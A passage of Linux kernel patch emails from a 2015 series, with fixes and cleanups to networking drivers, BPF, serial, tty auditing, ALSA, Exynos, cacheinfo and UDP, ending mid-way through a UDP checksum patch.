Subject: [PATCH 523/872] netevent: remove automatic variable in register_netevent_notifier() Remove automatic variable 'err' in register_netevent_notifier() and return the result of atomic_notifier_chain_register() directly. Signed-off-by: Wang Long Signed-off-by: David S. 
Miller --- net/core/netevent.c | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/net/core/netevent.c b/net/core/netevent.c index f17ccd291d39..8b3bc4fac613 100644 --- a/net/core/netevent.c +++ b/net/core/netevent.c @@ -31,10 +31,7 @@ static ATOMIC_NOTIFIER_HEAD(netevent_notif_chain); */ int register_netevent_notifier(struct notifier_block *nb) { - int err; - - err = atomic_notifier_chain_register(&netevent_notif_chain, nb); - return err; + return atomic_notifier_chain_register(&netevent_notif_chain, nb); } EXPORT_SYMBOL_GPL(register_netevent_notifier); From 0a726c2b499e390b1c1fc3092bd789f2192a2d03 Mon Sep 17 00:00:00 2001 From: "K. Y. Srinivasan" Date: Thu, 28 May 2015 17:08:06 -0700 Subject: [PATCH 524/872] hv_netvsc: Allocate the receive buffer from the correct NUMA node Allocate the receive bufer from the NUMA node assigned to the primary channel. Signed-off-by: K. Y. Srinivasan Signed-off-by: David S. Miller --- drivers/net/hyperv/netvsc.c | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/drivers/net/hyperv/netvsc.c b/drivers/net/hyperv/netvsc.c index b0249685139c..d187965eba36 100644 --- a/drivers/net/hyperv/netvsc.c +++ b/drivers/net/hyperv/netvsc.c @@ -227,13 +227,18 @@ static int netvsc_init_buf(struct hv_device *device) struct netvsc_device *net_device; struct nvsp_message *init_packet; struct net_device *ndev; + int node; net_device = get_outbound_net_device(device); if (!net_device) return -ENODEV; ndev = net_device->ndev; - net_device->recv_buf = vzalloc(net_device->recv_buf_size); + node = cpu_to_node(device->channel->target_cpu); + net_device->recv_buf = vzalloc_node(net_device->recv_buf_size, node); + if (!net_device->recv_buf) + net_device->recv_buf = vzalloc(net_device->recv_buf_size); + if (!net_device->recv_buf) { netdev_err(ndev, "unable to allocate receive " "buffer of size %d\n", net_device->recv_buf_size); From 5defde5946676ee23cd6a9d0e1de899410f4a33f Mon Sep 17 00:00:00 2001 From: "K. Y. Srinivasan" Date: Thu, 28 May 2015 17:08:07 -0700 Subject: [PATCH 525/872] hv_netvsc: Allocate the sendbuf in a NUMA aware way Allocate the send buffer in a NUMA aware way. Signed-off-by: K. Y. Srinivasan Signed-off-by: David S. Miller --- drivers/net/hyperv/netvsc.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/net/hyperv/netvsc.c b/drivers/net/hyperv/netvsc.c index d187965eba36..06de98a05622 100644 --- a/drivers/net/hyperv/netvsc.c +++ b/drivers/net/hyperv/netvsc.c @@ -326,7 +326,9 @@ static int netvsc_init_buf(struct hv_device *device) /* Now setup the send buffer. */ - net_device->send_buf = vzalloc(net_device->send_buf_size); + net_device->send_buf = vzalloc_node(net_device->send_buf_size, node); + if (!net_device->send_buf) + net_device->send_buf = vzalloc(net_device->send_buf_size); if (!net_device->send_buf) { netdev_err(ndev, "unable to allocate send " "buffer of size %d\n", net_device->send_buf_size); From 6b6d00076bf33fd1bfc95fa44218a6a089bc249a Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Sun, 31 May 2015 09:27:29 +0200 Subject: [PATCH 526/872] ALSA: hda - Fix jack detection at resume with VT codecs VT202x codecs seem requiring some delay after the resume D0 power transition for making the jack detection working again. Without the delay soon after D0, the jack is always detected as unplugged. 
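The two hv_netvsc changes above reduce to a single allocation pattern: try memory local to the NUMA node that services the channel, and fall back to any node rather than fail. A minimal sketch with a made-up helper name (the real code open-codes this inside netvsc_init_buf()):

#include <linux/vmalloc.h>

/* Hypothetical helper; netvsc_init_buf() open-codes this logic. */
static void *netvsc_alloc_buf(unsigned long size, int node)
{
        void *buf = vzalloc_node(size, node);   /* prefer the channel's node */

        if (!buf)
                buf = vzalloc(size);            /* fall back to any node */

        return buf;                             /* caller checks for NULL */
}
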
Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=98921 Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_via.c | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/sound/pci/hda/patch_via.c b/sound/pci/hda/patch_via.c index 31a95cca015d..bab6c04932aa 100644 --- a/sound/pci/hda/patch_via.c +++ b/sound/pci/hda/patch_via.c @@ -449,6 +449,15 @@ static int via_suspend(struct hda_codec *codec) return 0; } + +static int via_resume(struct hda_codec *codec) +{ + /* some delay here to make jack detection working (bko#98921) */ + msleep(10); + codec->patch_ops.init(codec); + regcache_sync(codec->core.regmap); + return 0; +} #endif #ifdef CONFIG_PM @@ -475,6 +484,7 @@ static const struct hda_codec_ops via_patch_ops = { .stream_pm = snd_hda_gen_stream_pm, #ifdef CONFIG_PM .suspend = via_suspend, + .resume = via_resume, .check_power_status = via_check_power_status, #endif }; From abf2e7d6e2e315b32ee00067a69aaad2cf4e1b3f Mon Sep 17 00:00:00 2001 From: Alexei Starovoitov Date: Thu, 28 May 2015 19:26:02 -0700 Subject: [PATCH 527/872] bpf: add missing rcu protection when releasing programs from prog_array Normally the program attachment place (like sockets, qdiscs) takes care of rcu protection and calls bpf_prog_put() after a grace period. The programs stored inside prog_array may not be attached anywhere, so prog_array needs to take care of preserving rcu protection. Otherwise bpf_tail_call() will race with bpf_prog_put(). To solve that introduce bpf_prog_put_rcu() helper function and use it in 3 places where unattached program can decrement refcnt: closing program fd, deleting/replacing program in prog_array. Fixes: 04fd61ab36ec ("bpf: allow bpf programs to tail-call other bpf programs") Reported-by: Martin Schwidefsky Signed-off-by: Alexei Starovoitov Acked-by: Daniel Borkmann Signed-off-by: David S. 
Miller --- include/linux/bpf.h | 6 +++++- kernel/bpf/arraymap.c | 4 ++-- kernel/bpf/syscall.c | 19 ++++++++++++++++++- 3 files changed, 25 insertions(+), 4 deletions(-) diff --git a/include/linux/bpf.h b/include/linux/bpf.h index 8821b9a8689e..5f520f5f087e 100644 --- a/include/linux/bpf.h +++ b/include/linux/bpf.h @@ -123,7 +123,10 @@ struct bpf_prog_aux { const struct bpf_verifier_ops *ops; struct bpf_map **used_maps; struct bpf_prog *prog; - struct work_struct work; + union { + struct work_struct work; + struct rcu_head rcu; + }; }; struct bpf_array { @@ -153,6 +156,7 @@ void bpf_register_map_type(struct bpf_map_type_list *tl); struct bpf_prog *bpf_prog_get(u32 ufd); void bpf_prog_put(struct bpf_prog *prog); +void bpf_prog_put_rcu(struct bpf_prog *prog); struct bpf_map *bpf_map_get(struct fd f); void bpf_map_put(struct bpf_map *map); diff --git a/kernel/bpf/arraymap.c b/kernel/bpf/arraymap.c index 614bcd4c1d74..cb31229a6fa4 100644 --- a/kernel/bpf/arraymap.c +++ b/kernel/bpf/arraymap.c @@ -202,7 +202,7 @@ static int prog_array_map_update_elem(struct bpf_map *map, void *key, old_prog = xchg(array->prog + index, prog); if (old_prog) - bpf_prog_put(old_prog); + bpf_prog_put_rcu(old_prog); return 0; } @@ -218,7 +218,7 @@ static int prog_array_map_delete_elem(struct bpf_map *map, void *key) old_prog = xchg(array->prog + index, NULL); if (old_prog) { - bpf_prog_put(old_prog); + bpf_prog_put_rcu(old_prog); return 0; } else { return -ENOENT; diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c index 98a69bd83069..a1b14d197a4f 100644 --- a/kernel/bpf/syscall.c +++ b/kernel/bpf/syscall.c @@ -432,6 +432,23 @@ static void free_used_maps(struct bpf_prog_aux *aux) kfree(aux->used_maps); } +static void __prog_put_rcu(struct rcu_head *rcu) +{ + struct bpf_prog_aux *aux = container_of(rcu, struct bpf_prog_aux, rcu); + + free_used_maps(aux); + bpf_prog_free(aux->prog); +} + +/* version of bpf_prog_put() that is called after a grace period */ +void bpf_prog_put_rcu(struct bpf_prog *prog) +{ + if (atomic_dec_and_test(&prog->aux->refcnt)) { + prog->aux->prog = prog; + call_rcu(&prog->aux->rcu, __prog_put_rcu); + } +} + void bpf_prog_put(struct bpf_prog *prog) { if (atomic_dec_and_test(&prog->aux->refcnt)) { @@ -445,7 +462,7 @@ static int bpf_prog_release(struct inode *inode, struct file *filp) { struct bpf_prog *prog = filp->private_data; - bpf_prog_put(prog); + bpf_prog_put_rcu(prog); return 0; } From 9809889c708ebffe240608eef39b667082f2c945 Mon Sep 17 00:00:00 2001 From: Sebastian Andrzej Siewior Date: Wed, 20 May 2015 22:07:35 +0200 Subject: [PATCH 528/872] serial: 8250_omap: provide complete custom startup & shutdown callbacks The currently in-use port->startup and port->shutdown are "okay". The startup part for instance does the tiny omap extra part and invokes serial8250_do_startup() for the remaining pieces. The workflow in serial8250_do_startup() is okay except for the part where UART_RX is read without a check if there is something to read. I tried to workaround it in commit 0aa525d11859 ("tty: serial: 8250_core: read only RX if there is something in the FIFO") but then reverted it later in commit ca8bb4aefb9 ("serial: 8250: Revert "tty: serial: 8250_core: read only RX if there is something in the FIFO""). 
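The bpf_prog_put_rcu() change above is an instance of the standard call_rcu() deferred-free idiom: embed an rcu_head in the object and free it from a callback that runs only after a grace period, so lockless readers that found the object under rcu_read_lock() can never see it freed underneath them. A generic sketch with hypothetical types (not kernel structures):

#include <linux/atomic.h>
#include <linux/kernel.h>
#include <linux/rcupdate.h>
#include <linux/slab.h>

struct item {
        atomic_t refcnt;
        struct rcu_head rcu;    /* lets the object ride the RCU callback queue */
        /* ... payload ... */
};

static void item_free_rcu(struct rcu_head *rcu)
{
        /* Runs after a grace period: no RCU reader can still hold a pointer. */
        struct item *it = container_of(rcu, struct item, rcu);

        kfree(it);
}

static void item_put(struct item *it)
{
        if (atomic_dec_and_test(&it->refcnt))
                call_rcu(&it->rcu, item_free_rcu);
}
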
This is the second attempt to get it to work on older OMAPs without breaking other chips this time Peter Hurley suggested to pull in the few needed lines from serial8250_do_startup() and drop everything else that is not required including making it simpler like using just request_irq() instead the chain handler like it is doing now. So lets try that. Fixes: ca8bb4aefb93 ("serial: 8250: Revert "tty: serial: 8250_core: read only RX if there is something in the FIFO"") Tested-by: Tony Lindgren Signed-off-by: Sebastian Andrzej Siewior Signed-off-by: Greg Kroah-Hartman --- drivers/tty/serial/8250/8250_omap.c | 82 +++++++++++++++++++++++++---- 1 file changed, 73 insertions(+), 9 deletions(-) diff --git a/drivers/tty/serial/8250/8250_omap.c b/drivers/tty/serial/8250/8250_omap.c index 9289999cb7c6..dce1a23706e8 100644 --- a/drivers/tty/serial/8250/8250_omap.c +++ b/drivers/tty/serial/8250/8250_omap.c @@ -562,12 +562,36 @@ static irqreturn_t omap_wake_irq(int irq, void *dev_id) return IRQ_NONE; } +#ifdef CONFIG_SERIAL_8250_DMA +static int omap_8250_dma_handle_irq(struct uart_port *port); +#endif + +static irqreturn_t omap8250_irq(int irq, void *dev_id) +{ + struct uart_port *port = dev_id; + struct uart_8250_port *up = up_to_u8250p(port); + unsigned int iir; + int ret; + +#ifdef CONFIG_SERIAL_8250_DMA + if (up->dma) { + ret = omap_8250_dma_handle_irq(port); + return IRQ_RETVAL(ret); + } +#endif + + serial8250_rpm_get(up); + iir = serial_port_in(port, UART_IIR); + ret = serial8250_handle_irq(port, iir); + serial8250_rpm_put(up); + + return IRQ_RETVAL(ret); +} + static int omap_8250_startup(struct uart_port *port) { - struct uart_8250_port *up = - container_of(port, struct uart_8250_port, port); + struct uart_8250_port *up = up_to_u8250p(port); struct omap8250_priv *priv = port->private_data; - int ret; if (priv->wakeirq) { @@ -580,10 +604,31 @@ static int omap_8250_startup(struct uart_port *port) pm_runtime_get_sync(port->dev); - ret = serial8250_do_startup(port); - if (ret) + up->mcr = 0; + serial_out(up, UART_FCR, UART_FCR_CLEAR_RCVR | UART_FCR_CLEAR_XMIT); + + serial_out(up, UART_LCR, UART_LCR_WLEN8); + + up->lsr_saved_flags = 0; + up->msr_saved_flags = 0; + + if (up->dma) { + ret = serial8250_request_dma(up); + if (ret) { + dev_warn_ratelimited(port->dev, + "failed to request DMA\n"); + up->dma = NULL; + } + } + + ret = request_irq(port->irq, omap8250_irq, IRQF_SHARED, + dev_name(port->dev), port); + if (ret < 0) goto err; + up->ier = UART_IER_RLSI | UART_IER_RDI; + serial_out(up, UART_IER, up->ier); + #ifdef CONFIG_PM up->capabilities |= UART_CAP_RPM; #endif @@ -610,8 +655,7 @@ static int omap_8250_startup(struct uart_port *port) static void omap_8250_shutdown(struct uart_port *port) { - struct uart_8250_port *up = - container_of(port, struct uart_8250_port, port); + struct uart_8250_port *up = up_to_u8250p(port); struct omap8250_priv *priv = port->private_data; flush_work(&priv->qos_work); @@ -621,11 +665,24 @@ static void omap_8250_shutdown(struct uart_port *port) pm_runtime_get_sync(port->dev); serial_out(up, UART_OMAP_WER, 0); - serial8250_do_shutdown(port); + + up->ier = 0; + serial_out(up, UART_IER, 0); + + if (up->dma) + serial8250_release_dma(up); + + /* + * Disable break condition and FIFOs + */ + if (up->lcr & UART_LCR_SBC) + serial_out(up, UART_LCR, up->lcr & ~UART_LCR_SBC); + serial_out(up, UART_FCR, UART_FCR_CLEAR_RCVR | UART_FCR_CLEAR_XMIT); pm_runtime_mark_last_busy(port->dev); pm_runtime_put_autosuspend(port->dev); + free_irq(port->irq, port); if (priv->wakeirq) 
free_irq(priv->wakeirq, port); } @@ -974,6 +1031,13 @@ static inline int omap_8250_rx_dma(struct uart_8250_port *p, unsigned int iir) } #endif +static int omap8250_no_handle_irq(struct uart_port *port) +{ + /* IRQ has not been requested but handling irq? */ + WARN_ONCE(1, "Unexpected irq handling before port startup\n"); + return 0; +} + static int omap8250_probe(struct platform_device *pdev) { struct resource *regs = platform_get_resource(pdev, IORESOURCE_MEM, 0); @@ -1075,6 +1139,7 @@ static int omap8250_probe(struct platform_device *pdev) pm_runtime_get_sync(&pdev->dev); omap_serial_fill_features_erratas(&up, priv); + up.port.handle_irq = omap8250_no_handle_irq; #ifdef CONFIG_SERIAL_8250_DMA if (pdev->dev.of_node) { /* @@ -1088,7 +1153,6 @@ static int omap8250_probe(struct platform_device *pdev) ret = of_property_count_strings(pdev->dev.of_node, "dma-names"); if (ret == 2) { up.dma = &priv->omap8250_dma; - up.port.handle_irq = omap_8250_dma_handle_irq; priv->omap8250_dma.fn = the_no_dma_filter_fn; priv->omap8250_dma.tx_dma = omap_8250_tx_dma; priv->omap8250_dma.rx_dma = omap_8250_rx_dma; From 72586c6061ab8c23ffd9f301ed19782a44ff5f04 Mon Sep 17 00:00:00 2001 From: Laura Abbott Date: Thu, 14 May 2015 11:42:17 -0700 Subject: [PATCH 529/872] n_tty: Fix auditing support for cannonical mode MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Commit 32f13521ca68bc624ff6effc77f308a52b038bf0 ("n_tty: Line copy to user buffer in canonical mode") changed cannonical mode copying to use copy_to_user but missed adding the call to the audit framework. Add in the appropriate functions to get audit support. Fixes: 32f13521ca68 ("n_tty: Line copy to user buffer in canonical mode") Reported-by: Miloslav Trmač Signed-off-by: Laura Abbott Reviewed-by: Peter Hurley Cc: stable Signed-off-by: Greg Kroah-Hartman --- drivers/tty/n_tty.c | 17 ++++++++++++++--- 1 file changed, 14 insertions(+), 3 deletions(-) diff --git a/drivers/tty/n_tty.c b/drivers/tty/n_tty.c index 759604e57b24..396344cb011f 100644 --- a/drivers/tty/n_tty.c +++ b/drivers/tty/n_tty.c @@ -162,6 +162,17 @@ static inline int tty_put_user(struct tty_struct *tty, unsigned char x, return put_user(x, ptr); } +static inline int tty_copy_to_user(struct tty_struct *tty, + void __user *to, + const void *from, + unsigned long n) +{ + struct n_tty_data *ldata = tty->disc_data; + + tty_audit_add_data(tty, to, n, ldata->icanon); + return copy_to_user(to, from, n); +} + /** * n_tty_kick_worker - start input worker (if required) * @tty: terminal @@ -2084,12 +2095,12 @@ static int canon_copy_from_read_buf(struct tty_struct *tty, __func__, eol, found, n, c, size, more); if (n > size) { - ret = copy_to_user(*b, read_buf_addr(ldata, tail), size); + ret = tty_copy_to_user(tty, *b, read_buf_addr(ldata, tail), size); if (ret) return -EFAULT; - ret = copy_to_user(*b + size, ldata->read_buf, n - size); + ret = tty_copy_to_user(tty, *b + size, ldata->read_buf, n - size); } else - ret = copy_to_user(*b, read_buf_addr(ldata, tail), n); + ret = tty_copy_to_user(tty, *b, read_buf_addr(ldata, tail), n); if (ret) return -EFAULT; From fe931229c61c04e0a7906c4ebef9623a4538a5ab Mon Sep 17 00:00:00 2001 From: Marc Zyngier Date: Wed, 22 Apr 2015 18:40:52 +0100 Subject: [PATCH 530/872] ARM: exynos: Fix wake-up interrupts for Exynos3250 Commit 8b283c025443 (ARM: exynos4/5: convert pmu wakeup to stacked domains) changed the Exynos PMU code to use stacked domains. This has led to a number of interrupt numbers to be fixed. 
In the meantime, support for Exynos 3250 was added, missing the required change to this platform. This amounts to revert ace283a04a4a (ARM: EXYNOS: Fix wrong hwirq of RTC interrupt for Exynos3250 SoC), as the initial patch was right, just a bit early... Cc: Chanwoo Choi Cc: Kyungmin Park Cc: Krzysztof Kozlowski Cc: Kukjin Kim Signed-off-by: Marc Zyngier Reviewed-by: Chanwoo Choi Signed-off-by: Krzysztof Kozlowski --- arch/arm/mach-exynos/suspend.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/arch/arm/mach-exynos/suspend.c b/arch/arm/mach-exynos/suspend.c index 3e6aea7f83af..40dce3628490 100644 --- a/arch/arm/mach-exynos/suspend.c +++ b/arch/arm/mach-exynos/suspend.c @@ -87,8 +87,8 @@ static unsigned int exynos_pmu_spare3; static u32 exynos_irqwake_intmask = 0xffffffff; static const struct exynos_wkup_irq exynos3250_wkup_irq[] = { - { 105, BIT(1) }, /* RTC alarm */ - { 106, BIT(2) }, /* RTC tick */ + { 73, BIT(1) }, /* RTC alarm */ + { 74, BIT(2) }, /* RTC tick */ { /* sentinel */ }, }; From 9eb0a5d1905235b968dce5c1fda294ac2663d840 Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Fri, 29 May 2015 12:25:54 +0100 Subject: [PATCH 531/872] sfc: free multiple Rx buffers when required When Rx packet data must be dropped, all the buffers associated with that Rx packet must be freed. Extend and rename efx_free_rx_buffer() to efx_free_rx_buffers() and loop through all the fragments. By doing so this patch fixes a possible memory leak. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/rx.c | 42 +++++++++++++++++++++-------------- 1 file changed, 25 insertions(+), 17 deletions(-) diff --git a/drivers/net/ethernet/sfc/rx.c b/drivers/net/ethernet/sfc/rx.c index c0ad95d2f63d..809ea4610a77 100644 --- a/drivers/net/ethernet/sfc/rx.c +++ b/drivers/net/ethernet/sfc/rx.c @@ -224,12 +224,17 @@ static void efx_unmap_rx_buffer(struct efx_nic *efx, } } -static void efx_free_rx_buffer(struct efx_rx_buffer *rx_buf) +static void efx_free_rx_buffers(struct efx_rx_queue *rx_queue, + struct efx_rx_buffer *rx_buf, + unsigned int num_bufs) { - if (rx_buf->page) { - put_page(rx_buf->page); - rx_buf->page = NULL; - } + do { + if (rx_buf->page) { + put_page(rx_buf->page); + rx_buf->page = NULL; + } + rx_buf = efx_rx_buf_next(rx_queue, rx_buf); + } while (--num_bufs); } /* Attempt to recycle the page if there is an RX recycle ring; the page can @@ -278,7 +283,7 @@ static void efx_fini_rx_buffer(struct efx_rx_queue *rx_queue, /* If this is the last buffer in a page, unmap and free it. 
*/ if (rx_buf->flags & EFX_RX_BUF_LAST_IN_PAGE) { efx_unmap_rx_buffer(rx_queue->efx, rx_buf); - efx_free_rx_buffer(rx_buf); + efx_free_rx_buffers(rx_queue, rx_buf, 1); } rx_buf->page = NULL; } @@ -304,10 +309,7 @@ static void efx_discard_rx_packet(struct efx_channel *channel, efx_recycle_rx_pages(channel, rx_buf, n_frags); - do { - efx_free_rx_buffer(rx_buf); - rx_buf = efx_rx_buf_next(rx_queue, rx_buf); - } while (--n_frags); + efx_free_rx_buffers(rx_queue, rx_buf, n_frags); } /** @@ -431,11 +433,10 @@ efx_rx_packet_gro(struct efx_channel *channel, struct efx_rx_buffer *rx_buf, skb = napi_get_frags(napi); if (unlikely(!skb)) { - while (n_frags--) { - put_page(rx_buf->page); - rx_buf->page = NULL; - rx_buf = efx_rx_buf_next(&channel->rx_queue, rx_buf); - } + struct efx_rx_queue *rx_queue; + + rx_queue = efx_channel_get_rx_queue(channel); + efx_free_rx_buffers(rx_queue, rx_buf, n_frags); return; } @@ -622,7 +623,10 @@ static void efx_rx_deliver(struct efx_channel *channel, u8 *eh, skb = efx_rx_mk_skb(channel, rx_buf, n_frags, eh, hdr_len); if (unlikely(skb == NULL)) { - efx_free_rx_buffer(rx_buf); + struct efx_rx_queue *rx_queue; + + rx_queue = efx_channel_get_rx_queue(channel); + efx_free_rx_buffers(rx_queue, rx_buf, n_frags); return; } skb_record_rx_queue(skb, channel->rx_queue.core_index); @@ -661,8 +665,12 @@ void __efx_rx_packet(struct efx_channel *channel) * loopback layer, and free the rx_buf here */ if (unlikely(efx->loopback_selftest)) { + struct efx_rx_queue *rx_queue; + efx_loopback_rx_packet(efx, eh, rx_buf->len); - efx_free_rx_buffer(rx_buf); + rx_queue = efx_channel_get_rx_queue(channel); + efx_free_rx_buffers(rx_queue, rx_buf, + channel->rx_pkt_n_frags); goto out; } From 3370e13aa463adb84488ebf0e599e3dc0024315b Mon Sep 17 00:00:00 2001 From: Sudeep Holla Date: Wed, 27 May 2015 11:26:13 +0100 Subject: [PATCH 532/872] drivers/base: cacheinfo: handle absence of caches On some simulators like GEM5, caches may not be simulated. In those cases, the cache levels and leaves will be zero and will result in following exception: Unable to handle kernel NULL pointer dereference at virtual address 0040 pgd = ffffffc0008fa000 [00000040] *pgd=00000009f6807003, *pud=00000009f6807003, *pmd=00000009f6808003, *pte=006000002c010707 Internal error: Oops: 96000005 [#1] PREEMPT SMP Modules linked in: CPU: 1 PID: 1 Comm: swapper/0 Not tainted 4.1.0-rc5 #198 task: ffffffc9768a0000 ti: ffffffc9768a8000 task.ti: ffffffc9768a8000 PC is at detect_cache_attributes+0x98/0x2c8 LR is at detect_cache_attributes+0x88/0x2c8 kcalloc(0) returns a special value ZERO_SIZE_PTR which is non-NULL value but results in fault only on any attempt to dereferencing it. So checking for the non-NULL pointer will not suffice. This patch checks for non-zero cache leaf nodes and returns error if there are no cache leaves in detect_cache_attributes. 
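The ZERO_SIZE_PTR pitfall described above is easy to see in isolation: kcalloc(0, size, GFP_KERNEL) does not return NULL, it returns the special non-NULL value ZERO_SIZE_PTR, which faults on any dereference. A sketch of the trap (hypothetical function, not the cacheinfo code):

#include <linux/slab.h>

static int example_alloc(unsigned int nents)
{
        int *p = kcalloc(nents, sizeof(*p), GFP_KERNEL);

        if (!p)                 /* does NOT trigger for nents == 0 ...  */
                return -ENOMEM; /* ... because p == ZERO_SIZE_PTR there */

        p[0] = 1;               /* faults when nents == 0               */
        kfree(p);               /* kfree(ZERO_SIZE_PTR) is safe, though */

        return 0;
}

Hence the fix checks cache_leaves(cpu) up front instead of relying on the allocation's return value.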
Cc: # 3.19.x Cc: Will Deacon Cc: Greg Kroah-Hartman Reported-by: William Wang Signed-off-by: Sudeep Holla Signed-off-by: Greg Kroah-Hartman --- drivers/base/cacheinfo.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/base/cacheinfo.c b/drivers/base/cacheinfo.c index 9c2ba1c97c42..df0c66cb7ad3 100644 --- a/drivers/base/cacheinfo.c +++ b/drivers/base/cacheinfo.c @@ -179,7 +179,7 @@ static int detect_cache_attributes(unsigned int cpu) { int ret; - if (init_cache_level(cpu)) + if (init_cache_level(cpu) || !cache_leaves(cpu)) return -ENOENT; per_cpu_cacheinfo(cpu) = kcalloc(cache_leaves(cpu), From c65b99f046843d2455aa231747b5a07a999a9f3d Mon Sep 17 00:00:00 2001 From: Linus Torvalds Date: Sun, 31 May 2015 19:01:07 -0700 Subject: [PATCH 533/872] Linux 4.1-rc6 --- Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Makefile b/Makefile index 92a707859205..aee7e5cb4c15 100644 --- a/Makefile +++ b/Makefile @@ -1,7 +1,7 @@ VERSION = 4 PATCHLEVEL = 1 SUBLEVEL = 0 -EXTRAVERSION = -rc5 +EXTRAVERSION = -rc6 NAME = Hurr durr I'ma sheep # *DOCUMENTATION* From 12d5e6fd1d66a8faa14e4922035bfed70bf014d5 Mon Sep 17 00:00:00 2001 From: Vaishali Thakkar Date: Mon, 1 Jun 2015 09:36:02 +0530 Subject: [PATCH 534/872] net: mv643xx_eth: Use setup_timer Use the timer API function setup_timer instead of structure field assignments to initialize a timer. A simplified version of the Coccinelle semantic patch that performs this transformation is as follows: @change@ expression e, func, da; @@ -init_timer (&e); +setup_timer (&e, func, da); -e.data = da; -e.function = func; Signed-off-by: Vaishali Thakkar Signed-off-by: David S. Miller --- drivers/net/ethernet/marvell/mv643xx_eth.c | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/drivers/net/ethernet/marvell/mv643xx_eth.c b/drivers/net/ethernet/marvell/mv643xx_eth.c index 1c75829eb166..d52639bc491f 100644 --- a/drivers/net/ethernet/marvell/mv643xx_eth.c +++ b/drivers/net/ethernet/marvell/mv643xx_eth.c @@ -3125,9 +3125,8 @@ static int mv643xx_eth_probe(struct platform_device *pdev) mib_counters_clear(mp); - init_timer(&mp->mib_counters_timer); - mp->mib_counters_timer.data = (unsigned long)mp; - mp->mib_counters_timer.function = mib_counters_timer_wrapper; + setup_timer(&mp->mib_counters_timer, mib_counters_timer_wrapper, + (unsigned long)mp); mp->mib_counters_timer.expires = jiffies + 30 * HZ; spin_lock_init(&mp->mib_counters_lock); @@ -3136,9 +3135,7 @@ static int mv643xx_eth_probe(struct platform_device *pdev) netif_napi_add(dev, &mp->napi, mv643xx_eth_poll, NAPI_POLL_WEIGHT); - init_timer(&mp->rx_oom); - mp->rx_oom.data = (unsigned long)mp; - mp->rx_oom.function = oom_timer_wrapper; + setup_timer(&mp->rx_oom, oom_timer_wrapper, (unsigned long)mp); res = platform_get_resource(pdev, IORESOURCE_IRQ, 0); From 52e0b2b15bdbb605bf38b4ed9cdc5b46587b18d6 Mon Sep 17 00:00:00 2001 From: Vaishali Thakkar Date: Mon, 1 Jun 2015 09:55:10 +0530 Subject: [PATCH 535/872] net: dl2k: Use setup_timer Use the timer API function setup_timer instead of structure field assignments to initialize a timer. A simplified version of the Coccinelle semantic patch that performs this transformation is as follows: @change@ expression e1, e2, e3, e4, a, b; @@ -init_timer(&e1); +setup_timer(&e1, a, b); ... when != a = e2 when != b = e3 -e1.data = b; ... when != a = e4 -e1.function = a; Signed-off-by: Vaishali Thakkar Signed-off-by: David S. 
Miller --- drivers/net/ethernet/dlink/dl2k.c | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/drivers/net/ethernet/dlink/dl2k.c b/drivers/net/ethernet/dlink/dl2k.c index 1274b6fdac8a..cf0a5fcdaaaf 100644 --- a/drivers/net/ethernet/dlink/dl2k.c +++ b/drivers/net/ethernet/dlink/dl2k.c @@ -463,10 +463,8 @@ rio_open (struct net_device *dev) dw32(MACCtrl, dr32(MACCtrl) | AutoVLANuntagging); } - init_timer (&np->timer); + setup_timer(&np->timer, rio_timer, (unsigned long)dev); np->timer.expires = jiffies + 1*HZ; - np->timer.data = (unsigned long) dev; - np->timer.function = rio_timer; add_timer (&np->timer); /* Start Tx/Rx */ From a24c85abc0815c14d9e5266d06b9acd8a0a57b9a Mon Sep 17 00:00:00 2001 From: Vaishali Thakkar Date: Mon, 1 Jun 2015 07:10:15 +0530 Subject: [PATCH 536/872] isdn/capi: Use setup_timer Use the timer API function setup_timer instead of structure field assignments to initialize a timer. A simplified version of the Coccinelle semantic patch that performs this transformation is as follows: @change@ expression e1, e2, e3, e4, a, b; @@ -init_timer(&e1); +setup_timer(&e1, a, b); ... when != a = e2 when != b = e3 -e1.data = b; ... when != a = e4 -e1.function = a; Signed-off-by: Vaishali Thakkar Signed-off-by: David S. Miller --- drivers/isdn/capi/capidrv.c | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/drivers/isdn/capi/capidrv.c b/drivers/isdn/capi/capidrv.c index 1cc6ca8bfbda..85cfa4f8691f 100644 --- a/drivers/isdn/capi/capidrv.c +++ b/drivers/isdn/capi/capidrv.c @@ -2264,7 +2264,7 @@ static int capidrv_addcontr(u16 contr, struct capi_profile *profp) return -1; } card->owner = THIS_MODULE; - init_timer(&card->listentimer); + setup_timer(&card->listentimer, listentimerfunc, (unsigned long)card); strcpy(card->name, id); card->contrnr = contr; card->nbchan = profp->nbchannel; @@ -2331,8 +2331,6 @@ static int capidrv_addcontr(u16 contr, struct capi_profile *profp) card->cipmask = 0x1FFF03FF; /* any */ card->cipmask2 = 0; - card->listentimer.data = (unsigned long)card; - card->listentimer.function = listentimerfunc; send_listen(card); mod_timer(&card->listentimer, jiffies + 60 * HZ); From beb39db59d14990e401e235faf66a6b9b31240b0 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Sat, 30 May 2015 09:16:53 -0700 Subject: [PATCH 537/872] udp: fix behavior of wrong checksums We have two problems in UDP stack related to bogus checksums : 1) We return -EAGAIN to application even if receive queue is not empty. This breaks applications using edge trigger epoll() 2) Under UDP flood, we can loop forever without yielding to other processes, potentially hanging the host, especially on non SMP. This patch is an attempt to make things better. We might in the future add extra support for rt applications wanting to better control time spent doing a recv() in a hostile environment. For example we could validate checksums before queuing packets in socket receive queue. Signed-off-by: Eric Dumazet Cc: Willem de Bruijn Signed-off-by: David S. 
